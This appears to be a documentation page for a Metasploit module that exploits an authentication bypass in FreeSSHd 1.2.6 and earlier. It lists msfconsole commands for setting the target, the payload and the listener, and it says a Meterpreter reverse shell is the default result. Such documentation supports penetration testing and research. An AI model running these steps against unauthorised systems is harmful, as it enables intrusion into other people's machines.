Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md
Views: 11789
Description
This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
Verification
Start msfconsole
Do :
use exploit/windows/ssh/freesshd_authbypass
Do :
set RHOST [target IP]
Do :
set PAYLOAD [valid windows payload]
if you want to use other payloads (windows/meterpreter/reverse_tcp
by default)Do :
set LHOST [Your IP]
Do :
set LPORT [valid port]
(port is4444
by default)Do :
exploit
If target is vulnerable, a shell (
meterpreter
by default) should pop